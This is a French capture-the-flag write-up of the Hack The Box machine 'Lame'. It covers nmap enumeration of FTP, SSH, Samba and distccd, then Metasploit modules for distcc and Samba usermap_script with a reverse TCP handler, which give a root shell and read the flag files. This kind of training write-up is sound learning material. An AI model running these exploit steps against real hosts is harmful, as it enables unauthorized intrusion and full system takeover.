À mon avis, il s’agit réellement de la machine la plus simple sur toute la plateforme HTB. On trouve une vulnérabilité qui nous donne un accès administrateur, et à partir de là on lit facilement tous les flags.

Énumération Link to heading

Commençons avec un scan nmap :

nmap -Pn -A 10.10.10.3
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-26 20:46 CEST
Nmap scan report for 10.10.10.3
Host is up (0.079s latency).
Not shown: 996 filtered tcp ports (no-response)
PORT    STATE SERVICE     VERSION

21/tcp  open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 10.10.14.221
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status

22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)

139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)

445/tcp open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_smb2-time: Protocol negotiation failed (SMB2)
|_clock-skew: mean: 2h00m26s, deviation: 2h49m45s, median: 24s
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.20-Debian)
|   Computer name: lame
|   NetBIOS computer name: 
|   Domain name: hackthebox.gr
|   FQDN: lame.hackthebox.gr
|_  System time: 2025-05-26T14:47:35-04:00

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 58.70 seconds

L’on apprend que le service FTP permet l’authentification anonyme ce qui est très peu sûr, par contre aucun fichier n’est trouvé sur le disque partagé. On voit aussi que cette version de FTP est vulnérable à une porte dérobée qui permet l’exécution de code.

Le service SSH ne semble pas particulièrement vulnérable.

Le serveur SMB paraît vulnérable. Mais avant de s’y attarder, vérifions que nous n’avons pas raté de ports ouverts :

nmap -p- -Pn 10.10.10.3
21/tcp   open  ftp
22/tcp   open  ssh
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
3632/tcp open  distccd

Il y a un port non-conventionnel qui est ouvert. Penchons-nous sur son cas :

nmap -Pn -A -p 3632 10.10.10.3
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-26 20:59 CEST
Nmap scan report for 10.10.10.3
Host is up (0.079s latency).

PORT     STATE SERVICE VERSION
3632/tcp open  distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))

Le service distccd est apparemment un compilateur de code C, la version paraît vulnérable.

Vulnérabilité Link to heading

distccd Link to heading

D’abord, étudions le port non-conventionnel puisque c’est souvent là que sont les solutions.

Nous trouvons une vulnérabilité pour ce service et cette version, et metasploit en a un module spécifique :

msfconsole -q
msf6 > search distccd

Matching Modules
================

   #  Name                            Disclosure Date  Rank       Check  Description
   -  ----                            ---------------  ----       -----  -----------
   0  exploit/unix/misc/distcc_exec  2002-02-01       excellent  Yes    DistCC Daemon Command Execution

Sélectionnons ce module et lançons-le :

use 0
set rhosts 10.10.10.3
set lhost tun0
check
[+] 10.10.10.3:3632 - The target is vulnerable.

Le module nous indique que la cible est bien vulnérable :

run
[*] Started reverse TCP handler on 10.10.14.221:4444
[*] 10.10.10.3:3632 - stderr: bash: 106: Bad file descriptor
[*] Exploit completed, but no session was created.

Nous obtenons une erreur de création de session plusieurs fois de suite. Avant de persister, étudions la vulnérabilité SMB.

SMB Link to heading

Voyons si nous avons plus de chance avec cette vulnérabilité SMB. D’après notre scan nmap, la cible est une machine linux qui fait tourner le logiciel Samba version 3.0.20-Debian. Le module usermap_script semble prometteur.

msfconsole -q
search usermap_script
use 0
set rhosts 10.10.10.3
set lhost tun0
exploit
<SNIP>
whoami
root

Post-Exploitation Link to heading

L’exploitation du module nous donne directement un accès administrateur à la machine, pas besoin d’escalader les privilèges. Lisons simplement les drapeaux et terminons cette machine !

cat /root/root.txt
cat /home/makis/user.txt

Fin.